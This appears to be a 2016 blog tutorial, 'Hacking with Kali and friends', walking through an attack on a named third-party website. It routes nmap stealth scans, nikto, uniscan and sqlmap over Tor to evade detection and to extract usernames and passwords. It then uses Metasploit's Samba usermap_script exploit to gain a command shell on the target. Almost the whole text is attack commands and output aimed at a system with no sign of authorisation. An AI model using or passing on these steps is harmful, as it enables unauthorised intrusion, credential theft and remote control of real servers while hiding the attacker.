Saturday, February 20, 2016
Friday, February 5, 2016
Hacking with Kali and friends - Exploitorama
Scan the IP with nmap + proxychains to route it over Tor:
anon@1337-817chs:~$ sudo proxychains nmap -v -Pn -Ss -T4 -A -p 1-65535 104.28.##.105
Scan the site with nikto and uniscan + proxychains to route it over Tor:
anon@1337-817chs:~$ sudo proxychains nikto -h www.Jihadist.ps && proxychains nikto -h 104.28.##.105
anon@1337-817chs:~$ sudo proxychains ./uniscan -u https://www.Jihadist.ps/
That will take a while... check on your sqlmap results from chapter 1.
Any usernames or passwords? Ooh goody...
On to Metasploit!!
The following info should have been obtained with the help of the Tor-cloaked scanning:
Target IP (from nslookup): 104.28.##.105
Target OS and version (from nmap, set to zero ping with "-Pn" to avoid detection. The -Ss option tells nmap to perform a stealth scan; the -A option tells it to try to discover the OS).
Kick it old school by googling "OS version Exploit Metasploit" to check for any quick exploit modules in Metasploit.
We need to find out the OS, ports and services running on the target system.
Once you find the open ports and a service like a Samba port, it's party time.
Fire up Metasploit
anon@1337-817chs:~$ msfconsole
Route it through Tor
msf > set Proxies socks5:127.0.0.1:9050
We need to find the version of Samba...
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOST 104.28.##.105
RHOST => 104.28.##.105
msf auxiliary(smb_version) > set RPORT 445
RPORT => 445
msf auxiliary(smb_version) > exploit
With the version in hand, restart msfconsole; now we use the appropriate module...
anon@1337-817chs:~$ msfconsole
msf > set Proxies socks5:127.0.0.1:9050
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 104.28.##.105
msf exploit(usermap_script) > exploit
We now have a command shell on the target box... have fun!
Hacking Servers with Kali and friends - Chapter 1: SQL injection with sqlmap
Look up the target IP address (write the following info down):
anon@1337-817chs:~$ nslookup www.Jihadist.ps
Server: 8.8.8.8
Address: 8.8.8.8#53
Non-authoritative answer:
www.Jihadist.ps canonical name = Jihadist.ps.
Name: Jihadist.ps
Address: 104.28.##.105
Name: Jihadist.ps
Address: 104.28.##.105
Make sure Tor is installed and running.
Run sqlmap over Tor with a random user agent at the target page for usernames and passwords:
anon@1337-817chs:~$ sudo sqlmap --tor --random-agent -a --url=http://forums.Jihadist.ps
That will take a while. On to Metasploit in chapter 2.